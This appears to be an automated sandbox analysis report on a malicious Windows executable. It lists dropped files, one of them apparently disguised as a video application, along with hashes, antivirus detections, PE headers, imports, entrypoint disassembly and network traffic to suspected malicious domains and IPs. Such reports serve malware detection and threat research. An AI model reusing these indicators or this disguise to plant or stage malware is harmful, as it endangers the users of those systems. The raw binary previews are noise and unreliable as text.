                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d82............!..0.................. ........... ....................... ............@.....................................O.......h...............(...............8............................................ ............... ..H............text........ ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........S..4o..........................................................F......s....(....*..(....*..{....*..{....*..{....*..{....*..(......}......}......}.......}....*6..{....(...+**..{......*6..si........*...0...........(.....~........oj...*&~.......*N(....-.~.....on...*.0..........(....o......r...p(....(....r...po.......o...........%.~.......(..........o....&........o .......u....,.~......o!...on... ...!...~..u....,.~......o!...on... ..."...[..u....,.~......o!...on... ...#
                                                                                                              C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exe
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                              Category:dropped
                                                                                                              Size (bytes):574976
                                                                                                              Entropy (8bit):7.836549545044653
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:8dyQUaL0a2eSteSPFRLbsY/hhgKXmEuIzRP/IYLkbQVBMvtAdhKuD:syQTLcTUGAhILzpIkkCMvShX
                                                                                                              MD5:676757904C8383FD9ACBEED15AA8DCC4
                                                                                                              SHA1:63F219EC9EF458A258B1845F42D46D2B12F30E8A
                                                                                                              SHA-256:B44ACC4498924F5FA6A479E263626E3A36FEE380C6D7463269BC5054DC64C4A9
                                                                                                              SHA-512:A4D4C945D334153FB91F2736A1EF20F6C4B5C710EC7E2064CDEF503D926BB5DA16F6ED32C56D2FC94EBB0F75BE5E25E0C4CF13E8F9A8F2FD2F110B547AEC0845
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....b._.................r.......................@..........................`...................p......................................\...................................................P...........................@............................MPRESS1.................................MPRESS2p................................rsrc...\...........................@..............................................................................v2.19...... ..5...5.|..y...#Vr..n!r..D&..7....z!ST.z..8...s.K..q9.......{M..1.l....b..C.v....Q.3..b.......E.7._../.....8.uq...;.....Y..wcIE.....g....I...s.S....4 .I........<j7X..R....y....h..k..m{.2-[.SB0.ZX//..Au..xi....:e`x.9.Z...].q._Ui_y..^.{.I%U-.>....{.{S..Ic=1|...G.T....oY/......w..e..d..W%.A../l.G{.Z...."....-...s.Ll.YA[.l7...2!...z.8..m..j..2".x..@..T..... .............V.^./......p.Ex.~.&.T.o.a.yT........r=.|..8.l...3...x.Do.Rt.....a..f....y.4..

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.99387668493442
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:KeJ7Cl7flZ.exe
                                                                                                              File size:7922731
                                                                                                              MD5:4e759849412063c6590936671ce4aa0e
                                                                                                              SHA1:40d132516cc4b9aa00dca2b2f068c439cf8f59c3
                                                                                                              SHA256:7a79f0c95e891b939e275fa19e641b676f2eb70471945fb3b15d6a649cafe071
                                                                                                              SHA512:636f2e0049eab66d31a07446dbd9a747931c2ee8954b9878a7133c783e530eeba7b45060ad3bcf2f7e70c96fac4b680650c6c501aabb48cdfe98457535297e91
                                                                                                              SSDEEP:196608:KBYjwbZ5mValPcW4lib2cnmzq3oi7eGhJe+Qc7z11mX6ZnGw:jM5GMxb2cmcoi7Pa8z11mXg
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}.k...k...k..c.a..k..c.c.[k..c.b..k..I.W..k...5./.k...5./.k...5./.k.......k.......k...k..!k..@5./.k..@5./.k..E5o..k..@5./.k.

                                                                                                              File Icon

                                                                                                              Icon Hash:d49494d6c88ecec2

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x413c60
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                              DLL Characteristics:GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                              Time Stamp:0x5EF47EA5 [Thu Jun 25 10:38:29 2020 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:5
                                                                                                              OS Version Minor:1
                                                                                                              File Version Major:5
                                                                                                              File Version Minor:1
                                                                                                              Subsystem Version Major:5
                                                                                                              Subsystem Version Minor:1
                                                                                                              Import Hash:ae9f6a32bb8b03dce37903edbc855ba1

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              call 00007FF0987CDBDDh
                                                                                                              jmp 00007FF0987CD51Dh
                                                                                                              cmp ecx, dword ptr [00431558h]
                                                                                                              jne 00007FF0987CD695h
                                                                                                              ret
                                                                                                              jmp 00007FF0987CDD5Eh
                                                                                                              jmp 00007FF0987D20B3h
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              and dword ptr [00465380h], 00000000h
                                                                                                              sub esp, 28h
                                                                                                              push ebx
                                                                                                              xor ebx, ebx
                                                                                                              inc ebx
                                                                                                              or dword ptr [0043155Ch], ebx
                                                                                                              push 0000000Ah
                                                                                                              call 00007FF0987E0223h
                                                                                                              test eax, eax
                                                                                                              je 00007FF0987CD803h
                                                                                                              and dword ptr [ebp-10h], 00000000h
                                                                                                              xor eax, eax
                                                                                                              or dword ptr [0043155Ch], 02h
                                                                                                              xor ecx, ecx
                                                                                                              push esi
                                                                                                              push edi
                                                                                                              mov dword ptr [00465380h], ebx
                                                                                                              lea edi, dword ptr [ebp-28h]
                                                                                                              push ebx
                                                                                                              cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-28h]
mov ecx, dword ptr [ebp-1Ch]
mov dword ptr [ebp-08h], eax
xor ecx, 49656E69h
mov eax, dword ptr [ebp-20h]
xor eax, 6C65746Eh
or ecx, eax
mov eax, dword ptr [ebp-24h]
push 00000001h
xor eax, 756E6547h
or ecx, eax
pop eax
push 00000000h
pop ecx
push ebx
cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
mov dword ptr [edi+0Ch], edx
jne 00007FF0987CD6D5h
mov eax, dword ptr [ebp-28h]
and eax, 0FFF3FF0h
cmp eax, 000106C0h
je 00007FF0987CD6B5h
cmp eax, 00020660h
je 00007FF0987CD6AEh
cmp eax, 00020670h

Rich Headers

Programming Language:
• [ C ] VS2008 SP1 build 30729
• [EXP] VS2015 UPD3.1 build 24215
• [LNK] VS2015 UPD3.1 build 24215
• [IMP] VS2008 SP1 build 30729
• [C++] VS2015 UPD3.1 build 24215
• [RES] VS2015 UPD3 build 24213

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2ffa0 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2ffd4 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x67000 | 0xdfd0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x75000 | 0x27ec | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2e810 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x29238 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x27000 | 0x220 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x2f694 | 0x100 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x25f0a | 0x26000 | False | 0.577264083059 | data | 6.69284076721 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x27000 | 0x9c14 | 0x9e00 | False | 0.453075553797 | data | 5.20986268254 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x31000 | 0x34d90 | 0xe00 | False | 0.377790178571 | data | 3.79528519664 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.didat | 0x66000 | 0x15c | 0x200 | False | 0.408203125 | data | 2.99773455687 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x67000 | 0xdfd0 | 0xe000 | False | 0.637050083705 | data | 6.63698184983 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x75000 | 0x27ec | 0x2800 | False | 0.8044921875 | data | 6.7259837024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
PNG | 0x67650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States
PNG | 0x68198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States
RT_ICON | 0x69748 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x69cb0 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x6a558 | 0xea8 | data | English | United States
RT_ICON | 0x6b400 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x6b868 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x6c910 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x6eeb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_DIALOG | 0x73588 | 0x286 | data | English | United States
RT_DIALOG | 0x73358 | 0x13a | data | English | United States
RT_DIALOG | 0x73498 | 0xec | data | English | United States
RT_DIALOG | 0x73228 | 0x12e | data | English | United States
RT_DIALOG | 0x72ef0 | 0x338 | data | English | United States
RT_DIALOG | 0x72c98 | 0x252 | data | English | United States
RT_STRING | 0x73f68 | 0x1e2 | data | English | United States
RT_STRING | 0x74150 | 0x1cc | data | English | United States
RT_STRING | 0x74320 | 0x1b8 | data | English | United States
RT_STRING | 0x744d8 | 0x146 | Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500 | English | United States
RT_STRING | 0x74620 | 0x446 | data | English | United States
RT_STRING | 0x74a68 | 0x166 | data | English | United States
RT_STRING | 0x74bd0 | 0x152 | data | English | United States
RT_STRING | 0x74d28 | 0x10a | data | English | United States
RT_STRING | 0x74e38 | 0xbc | data | English | United States
RT_STRING | 0x74ef8 | 0xd6 | data | English | United States
RT_GROUP_ICON | 0x72c30 | 0x68 | data | English | United States
RT_MANIFEST | 0x73810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, RtlUnwind, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 28, 2020 15:07:10.123815060 CET | 49732 | 80 | 192.168.2.5 | 101.36.107.74
Nov 28, 2020 15:07:10.383060932 CET | 80 | 49732 | 101.36.107.74 | 192.168.2.5
Nov 28, 2020 15:07:10.383348942 CET | 49732 | 80 | 192.168.2.5 | 101.36.107.74
Nov 28, 2020 15:07:10.385420084 CET | 49732 | 80 | 192.168.2.5 | 101.36.107.74
Nov 28, 2020 15:07:10.643752098 CET | 80 | 49732 | 101.36.107.74 | 192.168.2.5
Nov 28, 2020 15:07:10.647347927 CET | 80 | 49732 | 101.36.107.74 | 192.168.2.5
Nov 28, 2020 15:07:10.690886974 CET | 49732 | 80 | 192.168.2.5 | 101.36.107.74
Nov 28, 2020 15:07:10.825555086 CET | 49733 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:10.847800016 CET | 443 | 49733 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:10.847906113 CET | 49733 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:10.852497101 CET | 49733 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:10.874772072 CET | 443 | 49733 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:10.876108885 CET | 443 | 49733 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:10.876132965 CET | 443 | 49733 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:10.876152992 CET | 443 | 49733 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:10.876172066 CET | 443 | 49733 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:10.876313925 CET | 49733 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:10.989924908 CET | 49733 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:11.013079882 CET | 443 | 49733 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:11.050437927 CET | 49733 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:11.081525087 CET | 443 | 49733 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:11.081581116 CET | 443 | 49733 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:11.081764936 CET | 49733 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:11.213141918 CET | 49733 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:11.235768080 CET | 443 | 49733 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:11.237801075 CET | 49733 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:15.647485018 CET | 80 | 49732 | 101.36.107.74 | 192.168.2.5
Nov 28, 2020 15:07:15.649553061 CET | 49732 | 80 | 192.168.2.5 | 101.36.107.74
Nov 28, 2020 15:07:15.657855988 CET | 49732 | 80 | 192.168.2.5 | 101.36.107.74
Nov 28, 2020 15:07:15.916197062 CET | 80 | 49732 | 101.36.107.74 | 192.168.2.5
Nov 28, 2020 15:07:27.017199039 CET | 49737 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:27.039550066 CET | 443 | 49737 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:27.039808035 CET | 49737 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:27.042964935 CET | 49737 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:27.065248013 CET | 443 | 49737 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:27.067945957 CET | 443 | 49737 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:27.067984104 CET | 443 | 49737 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:27.068008900 CET | 443 | 49737 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:27.068033934 CET | 443 | 49737 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:27.068073034 CET | 49737 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:27.068104982 CET | 49737 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:27.082701921 CET | 49737 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:27.106343985 CET | 443 | 49737 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:27.106636047 CET | 49737 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:27.109718084 CET | 49737 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:27.141027927 CET | 443 | 49737 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:27.141211033 CET | 49737 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:35.965049028 CET | 49737 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:35.992804050 CET | 443 | 49737 | 88.99.66.31 | 192.168.2.5
Nov 28, 2020 15:07:35.992925882 CET | 49737 | 443 | 192.168.2.5 | 88.99.66.31
Nov 28, 2020 15:07:36.034851074 CET | 49737 | 443 | 192.168.2.5 | 88.99.66.31

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 28, 2020 15:05:07.095318079 CET | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:05:07.133047104 CET | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:05:08.119956970 CET | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:05:08.147207022 CET | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:05:09.232023001 CET | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:05:09.259229898 CET | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:05:10.403655052 CET | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:05:10.430695057 CET | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:05:11.601398945 CET | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:05:11.628647089 CET | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:05:24.353724003 CET | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:05:24.391411066 CET | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:05:30.798348904 CET | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:05:30.836570024 CET | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:05:32.873336077 CET | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:05:32.900485992 CET | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:05:36.056870937 CET | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:05:36.083870888 CET | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:05:55.802947998 CET | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:05:55.854155064 CET | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:05:57.190603018 CET | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:05:57.227457047 CET | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:06:01.406568050 CET | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:06:01.449820995 CET | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:06:02.737278938 CET | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:06:02.774029970 CET | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:06:34.033473015 CET | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:06:34.060530901 CET | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:07:10.783339977 CET | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:07:10.818804026 CET | 53 | 53813 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:07:21.704451084 CET | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:07:21.745177984 CET | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:07:23.718533993 CET | 57344 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:07:23.745588064 CET | 53 | 57344 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:07:26.942025900 CET | 54450 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:07:27.013183117 CET | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:07:27.148013115 CET | 59261 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:07:27.195842981 CET | 53 | 59261 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:07:28.849608898 CET | 57151 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:07:28.885410070 CET | 53 | 57151 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:07:33.152123928 CET | 59413 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:07:33.153711081 CET | 60516 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:07:33.187537909 CET | 53 | 59413 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:07:33.189069033 CET | 53 | 60516 | 8.8.8.8 | 192.168.2.5
Nov 28, 2020 15:07:33.945458889 CET | 51649 | 53 | 192.168.2.5 | 8.8.8.8
Nov 28, 2020 15:07:33.981333017 CET | 53 | 51649 | 8.8.8.8 | 192.168.2.5
                                                                                                              Nov 28, 2020 15:07:34.729815006 CET6508653192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:34.852657080 CET53650868.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:35.556140900 CET5643253192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:35.591646910 CET53564328.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:36.369559050 CET5292953192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:36.410165071 CET53529298.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:37.115530014 CET6431753192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:37.142649889 CET53643178.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:38.323499918 CET6237253192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:38.362081051 CET53623728.8.8.8192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 28, 2020 15:06:01.406568050 CET | 192.168.2.5 | 8.8.8.8 | 0xc97b | Standard query (0) | g.msn.com | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:10.783339977 CET | 192.168.2.5 | 8.8.8.8 | 0x7e08 | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:21.704451084 CET | 192.168.2.5 | 8.8.8.8 | 0x301b | Standard query (0) | 7553014bd6a4211b.xyz | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:26.942025900 CET | 192.168.2.5 | 8.8.8.8 | 0x43f1 | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:27.148013115 CET | 192.168.2.5 | 8.8.8.8 | 0xff88 | Standard query (0) | www.evograph.ro | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:28.849608898 CET | 192.168.2.5 | 8.8.8.8 | 0x8e02 | Standard query (0) | www.evograph.ro | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:33.152123928 CET | 192.168.2.5 | 8.8.8.8 | 0x7481 | Standard query (0) | 7553014bd6a4211b.xyz | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:33.153711081 CET | 192.168.2.5 | 8.8.8.8 | 0x504 | Standard query (0) | 7553014bd6a4211b.xyz | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:34.729815006 CET | 192.168.2.5 | 8.8.8.8 | 0x686 | Standard query (0) | trueaerned.com | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:36.369559050 CET | 192.168.2.5 | 8.8.8.8 | 0x7f6b | Standard query (0) | jojo-soft.xyz | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:37.115530014 CET | 192.168.2.5 | 8.8.8.8 | 0x4cea | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:38.323499918 CET | 192.168.2.5 | 8.8.8.8 | 0x75f3 | Standard query (0) | p421ls.xyz | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 28, 2020 15:06:01.449820995 CET | 8.8.8.8 | 192.168.2.5 | 0xc97b | No error (0) | g.msn.com | g-msn-com-nsatc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001)
Nov 28, 2020 15:07:10.818804026 CET | 8.8.8.8 | 192.168.2.5 | 0x7e08 | No error (0) | iplogger.org | - | 88.99.66.31 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:21.745177984 CET | 8.8.8.8 | 192.168.2.5 | 0x301b | No error (0) | 7553014bd6a4211b.xyz | - | 172.67.157.133 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:21.745177984 CET | 8.8.8.8 | 192.168.2.5 | 0x301b | No error (0) | 7553014bd6a4211b.xyz | - | 104.24.114.254 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:21.745177984 CET | 8.8.8.8 | 192.168.2.5 | 0x301b | No error (0) | 7553014bd6a4211b.xyz | - | 104.24.115.254 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:27.013183117 CET | 8.8.8.8 | 192.168.2.5 | 0x43f1 | No error (0) | iplogger.org | - | 88.99.66.31 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:27.195842981 CET | 8.8.8.8 | 192.168.2.5 | 0xff88 | No error (0) | www.evograph.ro | evograph.ro | - | CNAME (Canonical name) | IN (0x0001)
Nov 28, 2020 15:07:27.195842981 CET | 8.8.8.8 | 192.168.2.5 | 0xff88 | No error (0) | evograph.ro | - | 89.40.17.17 | A (IP address) | IN (0x0001)
